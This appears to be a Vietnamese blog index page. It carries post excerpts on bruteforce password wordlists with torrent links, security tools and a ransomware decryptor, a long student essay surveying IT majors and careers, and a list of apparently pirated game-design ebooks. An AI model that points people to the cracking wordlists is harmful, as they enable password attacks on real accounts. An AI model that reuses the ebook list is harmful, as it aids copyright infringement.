Tổng hợp Wordlist cho Bruteforce

, ,

1. Crackstation
GZIP-compressed (level 9). 4.2 GiB compressed. 15 GiB uncompressed. 
Link:  Torrent 

2. Human Passwords Only
GZIP-compressed. 247 MiB compressed. 684 MiB uncompressed. 
Link: Torrent 
Read More

Trend Micro Ransomware File Decryptor

, ,

AUTO UPDATE: CLICK HERE
Read More

Kali Linux Packages

,
Như các bạn đã biết, Kali Linux cung cấp cho chúng ta các công cụ hữu ích trong vấn đề bảo mật. Khi các bạn cài Kali Linux vào máy hoặc boot bằng USB thì cũng khá đầy đủ các công cụ rồi. Tuy nhiên do nhu cầu sử dụng khác nhau, Kali Linux lại cung cấp cho mọi người các gói công cụ khác nhau tùy vào mục đích sử dụng của từng thành phần. Chúng ta có thể liệt kê:
Read More

Ars Notoria

,

DOWNLOAD
Read More

Tổng quan ngành Công nghệ thông tin

,


Bài viết này của tác giả có nickname facebook là: Nguyễn Trung Thành
Link bài viết: Tổng quan ngành Công nghệ thông tin1
Tổng quan ngành Công nghệ thông tin

Bài viết này thích hợp cho: các em học sinh vừa thi Đại học, các bạn sinh viên CNTT sắp vào chuyên ngành, các bậc phụ huynh định hướng con cái học ngành CNTT, các bạn hay nhờ dân IT sửa máy tính, các thanh niên ảo tưởng về lương và việc làm trong ngành này.

Khác với các ngành khác, ngành Công nghệ thông tin (CNTT) cực kì rộng lớn, và là ngành công nghệ phát triển rất nhanh, nhanh đến mức mỗi ngày trôi qua là ta có khả năng lạc hậu so với hôm trước. Cuộc sống chúng ta đã thay đổi rất nhiều nhờ vào ngành CNTT. Các máy tính ngày càng mạnh và rẻ tiền, smartphone (điện thoại thông minh) khắp mọi nơi. Từ việc giảng dạy trên bảng truyền thống đến việc trình chiếu trên máy tính, từ việc liên lạc bằng thư viết tay đến thư điện tử và cuối cùng là tất cả mọi người kết nối với nhau trên Facebook thật dễ dàng…

Doanh nghiệp ngày nay muốn phát triển, mở rộng, chắc chắn không thể nào thiếu sự hỗ trợ của ngành CNTT trong việc tạo ra các website, quảng cáo, quản lý con người, lợi nhuận,…



Những người làm việc trong ngành CNTT thường giống như người ngoài hành tinh, vì họ có cái nhìn khác người. Họ được gọi là dân IT (Information Technology). Ở nước ngoài ngành CNTT được gọi là Computer Science, còn ở Việt Nam gọi là Information Technology.

Thế thì ngành Công nghệ thông tin là gì ? Nói theo cách dân dã thì đây là ngành làm việc với máy tính và các thiết bị, công nghệ liên quan máy tính, với mục đích là “cải thiện thế giới và con người”. Nghe thật là vĩ đại, thật ra là vì ngành này quá rộng, ứng dụng và hỗ trợ rất nhiều cho các ngành khác. Máy tính ở đây không hẳn là chiếc máy tính cá nhân hay laptop (máy tính xách tay), mà còn là chiếc điện thoại, robot, đồng hồ đeo tay, tivi,…. Và biết đâu một ngày không xa, ngay cả con chuột, loa, đèn, ghế ngồi, bàn làm việc, cái giường cũng có thể trở thành một chiếc máy tính, nhờ vào công nghệ IoT (Internet of Things) bùng nổ mạnh mẽ trên thế giới. Thật là thích phải không nào ?

Thích thì thích, nhưng không phải ai cũng có thể học ngành này. Ngành CNTT đòi hỏi bạn cần có sự đam mê, kiên trì, tư duy, tiếng Anh, kĩ năng sử dụng máy tính, thậm chí là cả sự may mắn. Chỉ cần thiếu một trong các yếu tố trên cũng đủ khiến bạn bị tụt hậu so với người khác.



Chỉ cần thiếu đi một yếu tố, bạn đã khó phát triển bản thân trong ngành CNTT

Bước vào ngành CNTT cũng như bước vào một cánh cửa khổng lồ, cao vời vợi, đầy rẫy các chông gai làm chùn bước của bạn. Một trong những nỗi ám ảnh kinh hoàng nhất đối với nhiều bạn là LẬP TRÌNH.

LẬP TRÌNH LÀ GÌ ?

Lập trình là việc khiến cho những đồ vật làm việc có quy tắc, có thứ tự để đạt được một kết quả nào đó.

Ví dụ như khi ta đi ăn cơm: đầu tiên là rửa tay, sau đó là lấy tô/chén, rồi bới/xới cơm, ăn cơm… Có thể nào ta bới cơm trước khi lấy tô/chén được không ?

Ví dụ khác: để nghe nhạc trên máy tính, đầu tiên ta cần bật nguồn chờ máy tính khởi động xong, sau đó ta mở chương trình chơi nhạc, sau đó chọn bài hát. Liệu có thể nào ta chọn bài hát trước khi bật nguồn được không ?

Chiếc máy tính Casio thân quen cũng vậy. Người sử dụng đơn giản nhập vào một biểu thức, và nó sẽ giúp ta tính kết quả. Để tính ra được kết quả đâu phải chuyện dễ, nó phải được lập trình để hiểu được biểu thức thì mới tính được. Nó sẽ phân tích, chia nhỏ các biểu thức ra, kiểm tra xem ta có nhậy vào bậy hay không,…

Xem phim bí mật cũng vậy. Đầu tiên ta cần phải kiểm tra có người ở quanh ta không, rồi đóng kín cửa phòng, sau đó mở sẵn 1 game vui nhộn hay là 1 trang đọc báo cứ như lưu manh giả danh tri thức để phòng hờ, tắt loa và đeo tai nghe, sau đó nhẹ nhàng vào xem nội dung bí mật. Nếu bạn hiểu điều này thì bạn có thể lập trình được con robot xem phim bí mật được rồi, thật là đơn giản.





Lập trình là việc bạn viết ra những dòng lệnh để máy tính thực hiện các lệnh một cách có quy tắc, có thứ tự. Những dòng lệnh đó gọi là code. Nhưng mà cuộc đời đâu phải như mơ, hầu hết chúng ta lập trình đều bị lỗi (vì câu lệnh sai, vì máy tính dở quá không hiểu được lệnh này, và vô số lỗi khác). Điều đó khiến ta rất nhức đầu, phiền muộn, stress. Các em nào đang có dự định vào ngành này thì cần chú ý nhé. Tuy nhiên, khi ta vượt qua được những khó khăn trên, ta sẽ rất sung sướng vì tạo ra được các sản phẩm tuyệt vời, một cái gì đó hay ho để đời, nhiều khi được tiền nữa. Đó có thể là căn cơ của sự đam mê học ngành Công nghệ thông tin.

Ghi nhớ: cho dù bạn học bất cứ cái gì trong ngành CNTT, bạn đều phải học lập trình. Lập trình là nền tảng quan trọng của ngành CNTT. Học CNTT mà không biết lập trình thì chưa thật sự là học CNTT, chưa phải là dân IT thực thụ.

OK, biết lập trình rồi thì sao ? Chúng ta cùng nhau đào sâu về ngành này một chút. Tùy vào sự phân chia trường phái võ công mà ta chia. Với quan điểm của mình thì hiện tại ngành CNTT có 4 chuyên ngành lớn như sau:

A. Kỹ thuật phần mềm (công nghệ phần mềm)

Đây là chuyên ngành mà sinh viên theo học nhiều nhất, vì dễ kiếm việc làm.

Chuyên ngành Kỹ thuật phần mềm (KTPM) này phù hợp cho những bạn nào thích lập trình thuần túy. Bạn cứ lập trình code suốt ngày là được, ha ha. Nói vậy chứ đâu có dễ.

Khi lập trình xong, thường ta sẽ tạo ra một sản phẩm gọi là “phần mềm”, “chương trình” hoặc “ứng dụng”. Bạn có biết rằng bạn đang sử dụng phần mềm khắp mọi nơi như: Microsoft Word, Excel, Powerpoint, trình duyệt web Chrome, Firefox,… chương trình vẽ Photoshop, chương trình Camera360 giúp con gái dụ dỗ con trai ghê hơn…thậm chí cả Facebook, Google Search, Zing MP3,… cũng là một dạng ứng dụng. Thậm chí cả hệ điều hành Microsoft Windows hay Linux cũng là phần mềm. Wow…

Bạn có thể tạo ra các phần mềm trên máy tính bình thường, hoặc là một trang web (website), hoặc là ứng dụng di động Android, iOS, hoặc lập trình ở mức độ sâu bên dưới về phần cứng, rất rộng.



Nhưng nếu bạn chỉ lập trình không thì chưa đủ để tạo ra phần mềm tốt cho khách hàng. Bởi vì việc tạo ra phần mềm tốt, có chất lượng đòi hỏi phải có một quy trình. Và trong mỗi quy trình đó, hình thành nên các công việc khác nhau, trong đó quan trọng nhất là lập trình viên (người lập trình – coder/programmer/developer).

Quy trình cơ bản là vầy nè: ban đầu ta sẽ xã giao, làm quen với khách hàng, trò chuyện với họ để lấy các yêu cầu của họ. Khách hàng nói chuyện bằng ngôn ngữ của riêng họ (y tế, giao thông, kinh doanh,…). Khách hàng thường chẳng biết code, chẳng hiểu gì về ngành CNTT cả. Lập trình viên chỉ biết ngôn ngữ code, đâu hiểu được các thuật ngữ y tế, giao thông gì đâu. Ngôn ngữ khác nhau, vậy thì làm sao lập trình viên và khách hàng có thể giao tiếp với nhau được? Và đây chính là nhiệm vụ của BA (Business Analyst). BA là người có khả năng giao tiếp, vừa hiểu được nghiệp vụ khách hàng mà vừa hiểu được cơ bản ngành CNTT. BA sẽ phân tích, mổ xẻ các yêu cầu khách hàng để bàn giao cho lập trình viên. Nhờ vào đó lập trình viên sẽ phân tích, lập trình tạo ra phần mềm. Làm ra phần mềm xong thích quá, nhận tiền thôi!!! Đâu dễ vậy, ta cần phải kiểm tra xem phần mềm có bị lỗi hay không, chạy có đúng như mong muốn khách hàng hay không, và đây là công việc của tester. OK hết thì mới giao phần mềm cho khách hàng và ôm tiền đi chơi với gấu thôi.

Tester thì ít lập trình hơn, họ có các công cụ, kĩ năng để kiểm tra phần mềm. Nếu như phần mềm là 1 game, tester sẽ là người chơi game, chơi suốt ngày thích ghê. Nhưng mà đâu có dễ vậy: chơi game để tìm lỗi, tìm được lỗi là lập trình viên phải sửa lỗi. Niềm vui của tester là nỗi đau cho developer.

Trong quá trình làm việc, luôn luôn có một người quản lý dự án (project manager) quản lý các lập trình viên, lên kế hoạch, bảo đảm tiến độ, là cầu nối của lập trình viên, BA, tester,… Họ là lãnh đạo. Họ không hẳn là người lập trình giỏi nhất, không hẳn là người tài nhất, nhưng họ có khả năng kích thích, tăng sự hưng phấn, tăng thêm nguồn động lực cho mọi người để hoàn thành dự án tốt.

Cao hơn nữa, ta còn có thể có CIO, Technical Architect (kiến trúc sư phần mềm), QA, QC, tá lả luôn.

Túm lại, người không thích lập trình, thích lập trình ít (như con gái chẳng hạn) thì có thể làm nghề tester hoặc BA.

B. Mạng máy tính và truyền thông

Ông bà ta có câu: “một cây làm chẳng nên non, ba cây chụm lại nên hòn núi cao”. Đoàn kết là sức mạnh, đoàn kết là chết chùm. Và điều này cũng là cội nguồn của chuyên ngành Mạng máy tính và truyền thông (MMT).

Một chiếc máy tính đơn lẻ, thật buồn tẻ. Hai chiếc máy tính đơn lẻ, hơi buồn tẻ. Nhưng nếu ba máy, hàng chục máy, hàng trăm, hàng triệu, tỉ máy tính kết nối với nhau lại, ta sẽ được một thứ gọi là Internet. Nhờ có Internet, ta có thể kết nối với khắp mọi người, có thể trò chuyện liên lạc với bạn bè qua Yahoo, Facebook, Twitter, Skype, Zalo…

Nhiều máy tính hợp lại còn có nhiều ưu điểm hơn nữa. Ví dụ như có hàng chục nhân viên, họ đều cần xài cái máy in. Không lẽ ta phải mua riêng máy in cho mỗi nhân viên ? Với hiểu biết về mạng máy tính thì thật đơn giản, bạn chỉ cần kết nối mọi thứ lại, và chiếc máy in sẽ được chia sẻ cho tất cả mọi người. Chia sẻ máy in thì chưa hoành tráng cho lắm, chia sẻ sức mạnh thì mới ghê. Để tính toán phép tính “2 mũ 1 tỉ cộng 3 mũ 5 trăm”, với chiếc máy tính bình thường chắc vài tuần mới tính xong. Nhưng nhờ vào sự chia sẻ sức mạnh của hàng trăm máy tính, chúng ta có thể tính toán được với thời gian chưa đến…vài giây.



Như đã nói ở đầu bài, trào lưu IoT (Internet of Things) được khởi xướng bởi hãng Microsoft đang rất được phát triển. IoT lấy nền tảng là mạng máy tính để kết nối mọi thứ lại với nhau. Một ngày không xa, ta có thể kết nối máy tính với…cái ghế ta đang ngồi, để điều khiển chúng đưa qua đưa lại, massage chẳng hạn. Cảm giác tuyệt vời.

Học về chuyên ngành này, bạn dĩ nhiên biết được cách để kết nối máy tính lại với nhau. Mà kết nối máy tính xong rồi thì chưa được, bạn cần phải cài đặt các dịch vụ hỗ trợ cho máy tính. Ví dụ như dịch vụ giúp máy tính truy cập được Internet, dịch vụ xử lý email, dịch vụ lưu trữ tá lả gì luôn, từ từ học rồi biết, nêu ra hết chắc bạn đọc ngủ hết quá.

Bạn có bao giờ thắc mắc chiếc máy tính thân yêu hoạt động ra sao, học ngành này bạn sẽ hiểu rõ, tường tận. Máy tính đang chạy, tự dưng rút ổ đĩa cứng ra khỏi máy tính, hỏi nó có còn hoạt động được không? Học chuyên ngành MMT và bạn sẽ trả lời được ^^. Bạn sẽ trở thành “dân IT thực thụ” vì bạn sẽ cần phải tự sửa chữa máy tính, diệt virus, sửa máy in, cài phần mềm, cài máy ảo,…

Cũng nhờ hiểu sâu về máy tính, hệ điều hành và cách hoạt động, bạn có khả năng tìm ra được những lỗi bên trong và khai thác chúng. Ví dụ như bạn hiểu được cách để người A nhắn tin cho người B, nhờ vậy bạn có thể “ăn cắp” nội dung tin nhắn, thậm chí cả mật khẩu nữa. Ồ, giống hacker ghê, sự thật là vậy. Nghe nói tới hacker/cracker chắc nhiều bạn thích dữ lắm, nhưng mà thường thì ảo tưởng thôi. Để trở thành hacker/cracker không nhất thiết học về chuyên ngành MMT này. Mình sẽ nói cụ thể hơn ở cuối bài viết. Tính chất này còn phù hợp cho bạn nào thích học về bảo mật (Security).

Học về chuyên ngành này, bạn có thể quản trị mạng máy tính (giống như quản lý phòng net ở mức độ chuyên nghiệp), thiết kế ra mạng máy tính. Bạn có thể làm về bảo mật cho mạng máy tính, chống lại hacker. Các trung tâm dữ liệu lớn (data center) đều cực kì cần đến bạn. Bạn cũng có thể làm nghề lập trình viên mạng máy tính. Nói chung cái gì liên quan mạng máy tính là bạn có thể chơi được hết.

Mỗi công ty đều cần mạng máy tính, và người đứng đầu chính là bạn. Tuy nhiên khả năng kiếm việc làm khó hơn chuyên ngành KTPM, bởi vì công ty bình thường cần ít người về mạng máy tính. Cho nên bạn hãy cố gắng học tốt, không bao giờ sợ thiếu việc làm trong ngành CNTT.

C. Hệ thống thông tin

Đây là chuyên ngành có thể nói là hẹp, ít phổ biến. Tuy nhiên bạn nên nhớ rằng: hiếm thì quý. Chuyên ngành KTPM thường được rất đông người nhảy vào, cạnh tranh rất nhiều, ngược lại HTTT thì rất ít. Nếu bạn vào chuyên ngành Hệ thống thông tin (HTTT) mà học tốt thì khả năng bạn có giá rất cao.



Bạn sẽ luôn luôn ám ảnh trong đầu với một thứ gọi là…cơ sở dữ liệu (database). Bạn cứ hiểu như vầy: bình thường bạn lưu trữ một câu văn “hôm nay tôi đi học”, bạn Tèo thì “hôm nay Tèo đi học”, bạn Tí thì “hôm nay Tí đi học và đi chơi”. Bây giờ ta có nhu cầu xác định được có bao nhiêu người đi học. Ấy dà, nghe dễ ghê. Tưởng tượng có hàng triệu, thậm chí hàng tỉ người “hôm nay …. đi học” thì sao, tìm kiếm thông tin bình thường thì chậm quá, làm bình thường chắc máy tính chạy mấy ngày chưa xong. Bạn vào Facebook mà chậm 20 giây bạn chịu được không ? Bạn chơi game lag bạn chịu được không ? Nhờ vào cơ sở dữ liệu, bạn thiết kế và lưu trữ dữ liệu theo một cách nào đó mà ngay lập tức chúng trả về kết quả nhanh, thuận tiện cho ta. Điều này giúp ta dễ chịu hơn bao giờ hết.



Ngân hàng luôn có mối liên hệ mật thiết với cơ sở dữ liệu, vì chỉ cần dữ liệu lộ ra ngoài là chết. Bạn sẽ học về cách để bảo toàn, an toàn dữ liệu hơn. Bây giờ tưởng tượng thêm nhé: bạn lập trình cái máy ATM rút tiền theo 4 bước:

Bước 1: nhận thẻ từ người dùng.

Bước 2: xác định thẻ hợp lệ.

Bước 3: nhả tiền ra cho người dùng.

Bước 4: trừ tiền người sử dụng (cập nhật tiền sau khi người dùng rút tiền).

Làm bình thường vậy thì thật là không an toàn chút nào. Giả sử một người hiểu được điều đó, họ đi rút 50 triệu từ ATM. Họ canh máy ATM vừa nhả tiền (bước 3) thì ngay lập tức …rút điện…. Cái máy ATM không thực hiện được bước thứ 4…. và họ không bị trừ tiền….họ rút tiền thoải mái, sướng quá…

Học về ngành HTTT, bạn sẽ hiểu sâu hơn, ngăn chặn điều đó nhờ vào một thứ gọi là giao tác (transaction), dễ gì mà qua mặt được.

Chưa hết, học HTTT bạn có mối liên hệ với chuyên ngành MMT. Bạn sẽ làm việc ở cấp độ tổng quát hơn, đó là kết nối thông tin giữa các thiết bị với nhau (hạ tầng Công nghệ thông tin). Bạn còn có thể làm về bảo mật trong cơ sở dữ liệu hoặc thương mại điện tử nữa, lấn sân sang kinh doanh luôn.
D. Khoa học máy tính


Thật ra Khoa học máy tính không hẳn là chuyên ngành, mà nó là một dạng nghiên cứu trong ngành CNTT theo các hướng đi khác nhau như: trí thông minh nhân tạo, xử lý video, âm thanh, v.v

Đây là chuyên ngành phải nói rằng rất là rộng lớn và thâm sâu hơn bao giờ hết. Nó len lỏi từng ngóc ngách vào tất cả các chuyên ngành còn lại. Nó đào sâu mọi thứ, tìm hiểu nguyên nhân, cội nguồn của vấn đề. Nó đào sâu lý thuyết, Toán học, Vật lý, nó có khả năng tạo ra các công nghệ mới. Nó có khả năng cải thiện được thế giới.

Nghe kinh quá phải không? Sự thật là vậy.



Lý thuyết bao giờ cũng là nền tảng của thực hành. Và chuyên ngành Khoa học máy tính (KHMT) chính là chuyên ngành thiên về lý thuyết nền tảng.

Lấy ví dụ luôn đi. Bạn vào Google để tìm kiếm. Làm sao Google trả về kết quả cho ta ngay lập tức trong tích tắc? Google lưu dữ rất nhiều dữ liệu giúp ta tìm kiếm thông tin. Mà nhắc tới dữ liệu thì bạn nhớ đến “cơ sở dữ liệu” đã nói ở chuyên ngành HTTT. Nhưng cơ sở dữ liệu thì chưa đủ. Phải còn nhanh hơn thế nữa, đó chính là Big Data. Bạn sẽ học rất nhiều lý thuyết về Toán học, hệ điều hành Linux (để sử dụng Hadoop) và nhiều thứ khác để có thể lĩnh hội được tốt Big Data. Nếu bạn thích thì hãy theo chuyên ngành KHMT.

Lấy ví dụ khác đơn giản hơn. Hãy tưởng tượng ra một đoàn người đang xếp hàng mua đồ ăn. Người đầu tiên sẽ được phục vụ, sau đó là người thứ hai,… Người nào đến trước phục vụ trước, đến sau phục vụ sau, đó chính là queue. Tưởng tượng một chồng ghế. Bạn xếp ghế 1, sau đó xếp ghế 2 lên trên, sau đó là ghế 3. Khi lấy ghế ra, hiển nhiên bạn sẽ lấy ghế 3 trước, rồi mới ghế 2, rồi ghế 1. Thứ tự bị đảo ngược, đó chính là stack. Bạn có tin chỉ nhờ vào hai ví dụ trên mà ta đã có thể ứng dụng để giúp cho máy tính Casio tính toán được biểu thức. Ví dụ ta nhập “5 + 2/4 – 3” là máy tính trả về kết quả = 2,5. Từ thực tế cuộc sống đi đến việc học lập trình.

Tuy nhiên ví dụ trên chỉ là đơn giản, khi học Khoa học máy tính bạn sẽ đào sâu hơn nữa về thuật toán và cấu trúc dữ liệu. Bạn sẽ nghiên cứu những phương pháp để giải quyết bài toán nhanh hơn, tốt hơn, hay hơn. Máy tính bạn duyệt web chậm, nhờ vào việc cải tiến thuật toán mà biết đâu máy tính duyệt web nhanh hơn, mượt hơn. Nghe nó có vẻ khó hiểu quá phải không nào, thôi từ từ học sẽ hiểu.

Một trong những lĩnh vực hot trong KHMT, đó là trí thông minh nhân tạo. Bạn có biết trí thông minh nhân tạo của người Nhật làm ra có thể sáng tác một đoạn văn ? Bạn có biết xe ôtô lái tự động ? Bạn có biết trí thông minh nhân tạo của Google DeepMind đã đánh bại huyền thoại cờ vây thế giới Lee Se-dol.

Thêm một ví dụ nữa. Ăn trộm ở Việt Nam không được ít cho lắm. Ta sẽ cần lắp camera để quan sát. Đó là bình thường thôi. Với ngành CNTT, ta có thể làm nhiều hơn thế. Camera sẽ thu hình, từ đó máy tính nhận dạng con người, phân tích hành động của họ. Nếu họ có hành động đi qua đi lại một chỗ nhiều lần, có thể là ăn trộm lắm chứ. Như vậy máy tính sẽ khoanh tròn cho ta biết để ta đề phòng chẳng hạn.

Và còn rất nhiều, nhiều cái khác nữa, chuyên ngành KHMT rất rộng. Cái quan trọng nhất là chuyên ngành này học thiên về lý thuyết, mà lý thuyết thì khó nhai. Sẽ rất khó và buồn ngủ nếu bạn chưa có nền tảng tốt.

Google, Microsoft, Facebook,… các hãng lớn rất thích bạn nào học về Khoa học máy tính.

ĐẶC ĐIỂM TRONG NGÀNH CNTT

Đặc điểm 1. 

Những ngành khác sau khi đi làm về, đầu óc bạn thường được thư giãn, tập trung cho giải trí, vợ con… Tuy nhiên những người làm về CNTT, khi đi làm về họ thường suy nghĩ, trăn trở những vấn đề mà họ chưa giải quyết. Nỗi ám ảnh nhiều khi đi vào cả giấc mơ. Cho nên người làm trong ngành CNTT thường rất bị stress, mệt mỏi, mất nhiều sức khỏe.

Đặc điểm 2. 

Tự học. Đây là một đặc điểm vừa hay vừa tai hại. Nó hay ở chỗ: nếu bạn thật sự cố gắng, đam mê thì dù bạn vào trường Đại học không tốt, bạn vẫn có thể hơn rất nhiều người. Vì vậy nên những em học sinh thi Đại học chưa đủ điểm để vào trường mình mong ước đừng buồn nhiều nhé. Học ngành CNTT ở Đại học thì 10% là từ giảng đường, 90% tự học. Học CNTT ta không chỉ học riêng nội dung bài giảng là xong, mà còn phải mở rộng ra rất nhiều, tự học bằng Google, bằng khả năng tiếng Anh và nhiều yếu tố khác. Chỉ cần bạn ngừng việc tự học và cập nhật kiến thức trong vài tháng, bạn sẽ trở nên tụt hậu so với công nghệ phát triển không ngừng.

Lý do đó một phần giải thích vì sao có những bạn sinh viên năm 1 năm 2 mà trình độ còn cao hơn nhiều so với vài bạn ra trường đi làm.

NHỮNG HIỂU LẦM CHƯA ĐÚNG 

Đọc hết những nội dung trên, có lẽ bạn đã phần nào hình dung được tổng quan ngành Công nghệ thông tin. Nhiều bạn nghĩ học CNTT tức là học lập trình, sai rồi. Học Công nghệ thông tin tức là (xem lại toàn bộ bài viết ở trên đi). 

Một trong những quan niệm, suy nghĩ to bự của rất nhiều bạn về một khái niệm trong ngành Công nghệ thông tin, đó là hacker/cracker. Các bạn thường bị ảo tưởng rằng làm hacker chắc là giỏi, là trùm về máy tính, chắc là ăn trộm được mật khẩu wifi thì ta đã là hacker. Hoàn toàn sai lầm. Thật ra thì hacker/cracker đơn giản là một người làm về Công nghệ thông tin, nhưng kiến thức uyên bác, sâu rộng, là người cực kì giỏi về máy tính, giỏi đúng nghĩa. Giỏi đúng nghĩa tức là hiểu được cơ chế hoạt động, từ đó có thể phát hiện ra lỗ hổng bảo mật, từ đó giúp cho phần mềm/phần cứng sửa lỗi tốt hơn. Hacker thường có 2 dạng là hacker về mạng máy tính, họ có khả năng đột nhập vào máy chủ và lấy dữ liệu, điều khiển máy tính người khác, v.v Dạng thứ 2 là hacker lập trình và hệ thống. Họ cực kì giỏi lập trình, am hiểu tường tận nền tảng máy tính bên dưới. Hacker có thể tốt, hoặc là xấu. Nếu hacker tốt (hacker mũ trắng), họ sẽ giúp người khác khắc phục lỗi bảo mật, ngược lại họ sẽ tận dụng để trục lợi (hacker mũ đen). 

Một số em học sinh vì thích chơi game nên nghĩ là mình nên vào ngành Công nghệ thông tin ??? Ồ, điều này thật là sai lầm. Game là sản phẩm của ngành Công nghệ thông tin. Nếu như bạn muốn học cách để tạo ra game, thì đó mới là lý do đúng đắn để học ngành này. 

MỘT SỐ CÂU HỎI THƯỜNG GẶP

1. Anh ơi vì sao trường Đại học em muốn vào chỉ có 2 chuyên ngành, không có đủ 4 chuyên ngành như anh nói ở trên ?

Điều này là hoàn toàn bình thường, mỗi trường Đại học có một chương trình học riêng. Chương trình học có thể thiếu, có thể đầy đủ, có thể tách riêng thành những chuyên ngành con nữa.

Ví dụ như có trường ra chuyên ngành “An toàn thông tin”. Thật ra đây là chuyên ngành về bảo mật và chủ đạo là bảo mật về thông tin. Về bảo mật thì sẽ có lấy vài môn bên Khoa học máy tính (mã hóa), bảo mật dữ liệu và database (Hệ thống thông tin), sẽ liên quan kiến trúc máy tính và hệ điều hành (Mạng máy tính).

Ví dụ khác, có trường ra chuyên ngành “Công nghệ thông tin” (trùng tên với ngành luôn). Nói cắt nghĩa ra tức là “công nghệ / thông tin” ==> công nghệ về thông tin. Bạn sẽ học về cách khai thác thông tin và lấy được tri thức (Khoa học máy tính), xử lý cơ sở dữ liệu và thương mại điện tử (Hệ thống thông tin), v.v

2. Cho em hỏi về cơ hội nghề nghiệp của ngành CNTT sau khi ra trường ?

Chỉ cần bạn học giỏi, bạn không bao giờ thiếu việc làm, không bao giờ thu nhập thấp. Mà để giỏi, thì bắt buộc phải có nhiều yếu tố (ví dụ như đam mê, tiếng Anh, kĩ năng IT,… như mình nói ở đầu bài viết).

Còn nếu bạn không đủ giỏi ? Bạn cũng chưa chắc thiếu việc làm, vì nhân lực ngành CNTT ở Việt Nam đang rất thiếu, bạn cố gắng đi thực tập ở công ty để tích lũy kinh nghiệm và nhìn xa hơn. Cái quan trọng là bạn giúp đỡ được cho công ty.

3. Cho em hỏi về lương trong ngành CNTT ?

Ngành CNTT thì lương thường giữ bí mật vì đó là một sự nhạy cảm. Nhìn chung bạn nào mới ra trường lương dao động từ 7 triệu đến 12 triệu (tính vào thời điểm mình viết: tháng 7 năm 2016). Nếu học khá, giỏi thì mức ấy sẽ cao hơn.

4. Anh ơi em đam mê ngành CNTT lắm nhưng em không biết bắt đầu từ đâu ?

Bạn phải có một chiếc máy tính/laptop đã. Hãy mày mò, voọc chúng, hãy cài đặt hệ điều hành, cài đặt những phần mềm mình thích, và học nó. Hãy học theo cách của một chuyên gia: hiểu được các hành động mình đang làm, và hãy tự đặt câu hỏi thắc mắc nhiều thứ. Ví dụ như bạn cài một phần mềm, bạn nhắm mắt click Next Next Next cho xong, như vậy là bạn vẫn học IT đúng cách. Bạn cần phải xem mỗi bước người ta hướng dẫn bạn làm gì, lỡ bước X nó cài đặt thêm phần mềm rác vào gây khó chịu, bạn cứ nhắm mắt ok click Next. Thế là xong phim, tự dưng bạn phát hiện ra các phần mềm đầy tiếng Trung Quốc xuất hiện, rồi máy chạy chậm,…thì bạn đã hiểu được nguyên do.

Bạn sẽ cần học lập trình. Hãy mua một cuốn sách hoặc tìm kiếm sách điện tử trên Google. Bạn cũng cần học tiếng Anh, tiếng Anh rất quan trọng trong ngành CNTT.

Tùy vào định hướng mà tính tiếp. Bạn cũng có thể làm học trò của mình, ha ha ha (xem phần dưới cùng của bài viết).

5. Anh ơi người ta hay nhờ dân IT sửa máy tính. Bạn của em học CNTT mà không biết sửa máy tính cho em ?

Những người trong ngành IT thường không thích điều này, bởi vì có thể họ là dân lập trình, hoặc họ chuyên về nghiên cứu, nên họ có thể chưa thể đủ kinh nghiệm giúp bạn. Dân IT không phải là thánh, không phải cái gì cũng biết, có bạn thì nhờ hack tài khoản Facebook, có bạn nhờ sửa máy in, thậm chí sửa luôn cái điện thoại bị hư pin, thiệt là bó tay.

Dù gì đi nữa, quan điểm của mình là: dân IT thì phải biết kĩ năng IT và tối thiểu phải biết cài đặt, sửa chữa máy tính cơ bản.

KẾT LUẬN

Tóm gọn lại, những bạn nào muốn học về ngành Công nghệ thông tin, cái quan trọng hàng đầu đó là đam mê. Học Công nghệ thông tin là rất khó, nếu thiếu đi sự đam mê sẽ nản và bỏ cuộc. Đam mê ở đây là sự yêu thích sau khi đã trải nghiệm. Nếu ban đầu bạn thấy hay hay, bạn nghĩ chắc là đam mê CNTT rồi, nhưng sau một thời gian trải nghiệm thì phát hoảng, bạn đã sai lầm, bạn chỉ mới thích ban đầu mà thôi.

Mình mất 5 tiếng để viết xong bài blog này. Trong bài viết một số từ ngữ chuyên môn mình né đi, do đó ngữ nghĩa có thể chưa đúng. Có gì bạn hãy thông cảm với một sinh viên chưa ra trường như mình. Hi vọng bài viết này sẽ giúp ích cho nhiều người.Tác giả bài viết: Nguyễn Trung Thành. Sinh viên khoa CNTT – Đại học Khoa học Tự nhiên (ĐHQG TP.HCM). VNG Fresher – Zalo group. Nhà đào tạo về lập trình và CNTT.

Bạn mới vào ngành CNTT, chưa biết học gì ? Bạn học lập trình chưa tốt ?

Hãy tham khảo một số khóa học lập trình cơ bản của mình, phù hợp cho các em học sinh phổ thông hoặc sinh viên yêu thích ngành CNTT: https://sites.google.com/site/tcitg1...

Một số sản phẩm của học trò mình khi học xong môn “Nhập môn lập trình”

Vài đồ án của học trò trong khóa học Nhập môn lập trình


Nếu bạn có những thắc mắc, hoặc là muốn kết bạn với mình, thì vui lòng để lại một tin nhắn nhé. Mình thường trả lời tin nhắn rất lâu.

Cảm ơn bạn đã bỏ nhiều thời gian đọc bài viết. Chúc bạn một ngày tốt lành :). Nếu bạn thấy hay thì hãy chia sẻ bài viết này cho nhiều người hơn nữa nhé :D.
Read More

40 Game Design Books

,


  • The MIT Press Video Game Spaces Image Play and Structure in 3D Worlds Mar.2009.eBook-DDU.pdf
  • Thomson Publishing – Serious Games. Games that Educate, Train and Inform.pdf
  • Video Game Design Revealed .chm
  • Videogames.and.Art.Mar.2007.pdf
  • VideoGameTheory.pdf
  • VintageGames.pdf (30.94 MB)
  • Wordware.Publishing,.Game.Design.Foundations.(2003).LiB.pdf (3.77 MB)
  • Writing for Animation Comics and Games.pdf (7.06 MB)
  • Gameplay and Design.pdf (5.12 MB)
  • McGraw-Hill – 2003 – Ultimate Game Design. Building Game Worlds – DDU.pdf (6.59 MB)
  • Morgan Kaufmann Game Design Workshop 2nd Edition Feb 2008.pdf (13.07 MB)
  • Muska and Lipman Premier-Trade Beginning Game Level Design Mar 2005.eBook-DDU.pdf (5.47 MB)
  • New Riders Games Game Architecture and Design A New Edition Nov.2003.pdf (6.43 MB)
  • Premier Press – Character Development And Storytelling For Games.pdf (10.52 MB)
  • Real Time Cinematography for Games.pdf (83.33 MB)
  • Story and Simulations for Serious Games.pdf (4.14 MB)
  • The Game Producer`s Handbook.pdf (4.61 MB)
  • Designing Virtual Worlds .chm (1.46 MB)
  • Emergence in Games.pdf (8.02 MB)
  • Game Architecture and Design.pdf (8.77 MB)
  • Game Character Design Complete.pdf (13.19 MB)
  • Game Design, Second Edition.pdf (6.78 MB)
